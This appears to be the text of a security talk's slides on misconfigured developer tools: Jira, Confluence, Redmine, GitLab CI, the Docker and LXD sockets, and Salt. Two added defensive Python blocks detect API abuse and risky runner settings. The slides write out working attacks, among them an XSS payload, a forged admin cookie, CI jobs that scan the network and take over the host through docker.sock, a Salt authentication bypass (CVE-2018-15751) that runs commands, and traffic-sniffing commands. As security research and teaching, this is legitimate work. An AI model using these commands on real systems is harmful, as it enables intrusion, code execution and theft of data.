
MISCONFIGURATION IN THE DEVELOPER INFRASTRUCTURE
Morozov Alexey, "Security myth destroyer"

What is misconfiguration?
1) Logic bugs introduced through developer negligence (comments left behind, hard-wired credentials, test functionality).
2) Incorrectly configured hardware or infrastructure services.
3) Insufficient control of access rights.
4) Nobody knows for sure.

Application solutions:
• Task management systems: Jira, Redmine, Scrum boards, etc.
• Continuous integration systems: TeamCity, GitLab CI, Jenkins
• Bug-tracking systems
• Containers: docker/lxc
• Wiki systems
• Monitoring and control systems

Task manager systems
• Jira
• Confluence
• Redmine
• Agile boards
• IDE extensions
• ...other

Jira – vulnerabilities
• Stack trace: https://jira.<company_name>.ru/rest/api/2/[]/
• Port management: 8000 – 8100
• Reading private panels
• Jira CSRF (X-Atlassian-Token: nocheck)
• Blind JQL

Jira – Stacktrace (screenshot slide)

Jira – Agile board (screenshot slides)
  https://jira.<company_name>.ru/secure/ManageRapidViews.jspa
  https://jira.<company_name>.ru/secure/RapidBoard.jspa?rapidView=434
  https://jira.<company_name>.ru/secure/RapidBoard.jspa?rapidView=435

Blind JQL
• https://<company_name>/jira/rest/api/2/mypermissions
• https://<company_name>/jira/rest/api/2/issue/1
• https://<company_name>/jira/rest/api/2/search?jql=status%3Dopen and description ~ "12345*"
• https://<company_name>/jira/rest/api/2/search?jql=description="kdhfbwk"
• https://<company_name>/jira/rest/api/2/search?jql=descriprion="123*" and id=10000

Blind JQL – when does it not work? (screenshot slide)
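As an added defender-side example (not from the deck), the Python below flags clients in a reverse-proxy access log that read Jira's /rest/api/2/ endpoints anonymously and issue contains/wildcard JQL searches of the kind shown above; it also covers the Confluence CQL search endpoint the deck discusses later. The combined log format and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed combined-format access log (assumption, not from the deck):
# field 3 is the authenticated user, "-" when the request was anonymous.
SAMPLE_LOG = """\
10.1.1.7 - - [12/Oct/2018:10:00:01 +0300] "GET /rest/api/2/mypermissions HTTP/1.1" 200 512
10.1.1.7 - - [12/Oct/2018:10:00:02 +0300] "GET /rest/api/2/issue/1 HTTP/1.1" 200 2048
10.1.1.7 - - [12/Oct/2018:10:00:03 +0300] "GET /rest/api/2/search?jql=description~%2212345*%22 HTTP/1.1" 200 900
10.1.1.7 - - [12/Oct/2018:10:00:04 +0300] "GET /rest/api/2/search?jql=description~%2212346*%22 HTTP/1.1" 200 900
10.1.1.9 - - [12/Oct/2018:10:01:00 +0300] "GET /rest/api/content/search?cql=space.title~%22s.*%22 HTTP/1.1" 200 4000
10.1.1.20 - alice [12/Oct/2018:10:02:00 +0300] "GET /rest/api/2/search?jql=assignee=currentUser() HTTP/1.1" 200 700
10.1.1.30 - - [12/Oct/2018:10:03:00 +0300] "GET /rest/api/2/issue/1 HTTP/1.1" 401 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) ')

def parse_line(line):
    """Split one access-log line into ip, user, path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, user, _method, target, status = m.groups()
    url = urlparse(target)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ip": ip, "user": None if user == "-" else user,
            "path": url.path, "query": query, "status": int(status)}

def is_blind_query(query):
    """Contains (~) or wildcard (*) JQL/CQL: the shape of a blind enumeration."""
    q = query.get("jql") or query.get("cql") or ""
    return "~" in q or "*" in q

def find_anonymous_api_abuse(log_text, min_hits=2):
    """Return {ip: stats} for clients that read /rest/api/ anonymously with 200s."""
    per_ip = defaultdict(lambda: {"api_hits": 0, "blind_queries": 0, "paths": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["user"] or rec["status"] != 200:
            continue  # authenticated or rejected requests are not the finding
        if not rec["path"].startswith("/rest/api/"):
            continue
        stats = per_ip[rec["ip"]]
        stats["api_hits"] += 1
        stats["paths"].add(rec["path"])
        if is_blind_query(rec["query"]):
            stats["blind_queries"] += 1
    return {ip: s for ip, s in per_ip.items()
            if s["api_hits"] >= min_hits or s["blind_queries"]}
```

A single anonymous 200 on /rest/api/2/mypermissions is itself the misconfiguration to fix (anonymous browse permission); the per-client counters only prioritise who is already walking the API.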
Confluence – vulnerabilities
• Stack trace: https://confluence.<company_name>.ru/rest/api/content/[]/
• Reading open spaces without authorization
• Blind CQL

Confluence – Stacktrace (screenshot slide)

Reading open spaces
• https://confluence.ru/rest/api/space
• https://confluence.ru/rest/api/content/
• https://confluence.ru/rest/api/space/{SPACEKEY}
• https://confluence.ru/rest/api/content/{ContentI}
(screenshot slide)

Blind CQL
  api/content/search?cql=space.title~"s.*"

Redmine – XSS (screenshot slides)
  !l(" onerror=alert(/1/))!
Redmine – basic.php (screenshot slide)

Worksection – broken auth (screenshot slides)

Asana – broken session (screenshot slides)
  soft_signup_user_id=5166376; soft_signup_email=hac126%40mail.ru; xi_ip=97.12.23.123; soft_signup_invitation_token=numeric_token-5166375-672796; gtm_u_id=5166376; dapulseUserId=5166375; gtm_u_is_admin=true; gtm_a_paying_value=0.0;

HiTask – XSS (screenshot slide)
HiTask – LFI (screenshot slides)

TFS (screenshot slides)

TeamCity – guest access (screenshot slides)

Docker/LXD API
  docker run -v /var/run/docker.sock:/var/run/docker.sock debian ls
  curl --unix-socket /var/run/docker.sock http://<ip>/new

LXD API – port 8443
  curl -s --unix-socket /var/lib/lxd/unix.socket a/1.0/containers/
  { "type": "async", "status": "Operation created", "status_code": 100, "metadata": { "id": "439bf4a1-e056-4b76-86ad-bff06169fce1", "class": "task", "created_at": "2016-04-18T22:56:22.590239576 (output truncated on the slide)

GitLab
• Intercepting source code
• API
• Enumerating keys
• https://gitlab.rambler.ru/al.morozov.keys

GitLab
1) Create a file named .gitlab-ci.yml to scan the internal network:
  job1:
    script:
      - ifconfig

2) Scan port 2375:
  job1:
    script:
      - nmap 10.234.0.3/16 -P0 -p 2375 -n --open --min-rate=300
(screenshot slide)

GitLab
  job1:
    script:
      - ip addr
      - ps aux
      - curl -s --unix-socket /var/run/docker.sock http:/containers/json
(screenshot slides)

GitLab
  curl -s --unix-socket /var/run/docker.sock "http:/containers/create?name=72701f424a15661108227ea65a0548dbcbf6f5343207b050431980b71af7f7ec" -X POST -H "Content-Type: application/json" -d '{"Cmd": [ "ls", "-la", "./" ]}'

GitLab (API) – snippets
• https://gitlab.test.ru/explore/snippets
• https://gitlab/snippets/648

GitLab (API) – projects
• 1) https://gitlab/api/v4/projects
• 2) wfuzz -c -z range,1-10000 --sc=200 https://gitlab/api/v4/projects/FUZZ
(screenshot slide)

GitLab (API) – users
• https://gitlab/api/v4/users/
• https://gitlab/api/v4/users/2
• https://<host>/<user>.keys

Sentry (screenshot slides)

Salt – auth bypass API (0-day), CVE-2018-15751
  curl -si POST https://<host>.ru/login -H "Accept: application/json" -d username="<LDAP LOGIN>" -d password="s" -d eauth='ldap'
(screenshot slide: the login response returns a token)
  The token from the response is then sent as X-Auth-Token: 694a7dfa16.........cacfcb0d26650d21bd

Salt – auth bypass API (0-day), CVE-2018-15751
  curl -isi -H 'X-Auth-Token: 694a7dfa168........cfcb0d26650d21bd' -H 'Content-type: application/json' https://<host>/ -d '[{"client":"local", "tgt":"*", "fun":"cmd.run", "kwarg":{"cmd":"id"}, "eauth":"auto"}]'
(screenshot slide)

ARM sniffer
Given: a device within the network and access to it.
Task: sniff traffic from this device.
Restrictions: can't upload a file (1 MB disk size), not root.

ARM sniffer
  mount root_fs_arm.ext2 /opt/arm
  apt-get install qemu qemu-user-static
  cd /opt/arm
  sudo cp /usr/bin/qemu-arm-static ./usr/bin/
  chroot ./ /usr/bin/qemu-arm-static /bin/sh
  gcc sniff.c -static

ARM sniffer
  cat socket | ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o Ciphers=+3des-cbc -o MACs=+hmac-sha1 ADMIN@<HOST> "echo - > /var/snif"
  sshpass -p ADMIN ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o Ciphers=+3des-cbc -o MACs=+hmac-sha1 ADMIN@<SERVER> /var/socket_tcp | cat - > tcp_log &
(screenshot slide)

IPAM
  curl -X POST https://<host>/api/v1/ip/<IP>/21?dns=true

+3 bonus keys

Rambler – broken access control (screenshot slides)
Antichat – similar threads (screenshot slide)
VoiceCards – free calls (screenshot slides)

Thank you for your attention.
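The GitLab CI slides above chain a runner that exposes /var/run/docker.sock (or a Docker daemon on plaintext port 2375) into host access from any pipeline. As an added defender-side example (not from the deck or from GitLab), the Python below audits a GitLab Runner config.toml for exactly those settings; the sample config and the minimal line parser are assumptions.

```python
import re

# Constructed GitLab Runner config.toml (assumption, not from the deck): builder-1
# hands jobs the host Docker socket and runs them privileged; builder-2 points
# jobs at a Docker daemon on plaintext TCP 2375 without TLS verification.
SAMPLE_CONFIG = """
[[runners]]
  name = "builder-1"
  executor = "docker"
  [runners.docker]
    privileged = true
    volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"]

[[runners]]
  name = "builder-2"
  executor = "docker"
  [runners.docker]
    host = "tcp://10.0.0.5:2375"
    tls_verify = false
    volumes = ["/cache"]
"""

KEY_RE = re.compile(r'^(\w+)\s*=\s*(.+?)\s*$')

def parse_runners(text):
    """Minimal line parser: one flat key/value dict per [[runners]] block."""
    runners, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "[[runners]]":
            current = {}
            runners.append(current)
            continue
        m = KEY_RE.match(line)
        if current is not None and m:
            current[m.group(1)] = m.group(2).strip('"')
    return runners

def audit_runner_config(text):
    """Return (runner name, finding) pairs for settings that let a CI job reach the host."""
    findings = []
    for r in parse_runners(text):
        name = r.get("name", "<unnamed>")
        if re.search(r'["\']/var/run/docker\.sock:', r.get("volumes", "")):
            findings.append((name, "host docker.sock mounted into jobs"))
        if r.get("privileged") == "true":
            findings.append((name, "jobs run as privileged containers"))
        if r.get("host", "").startswith("tcp://") and r.get("tls_verify") != "true":
            findings.append((name, "Docker API over plaintext TCP without tls_verify"))
    return findings
```

Either finding means any user who can push a .gitlab-ci.yml to a project served by that runner can list and create containers on the host, which is the chain the slides demonstrate.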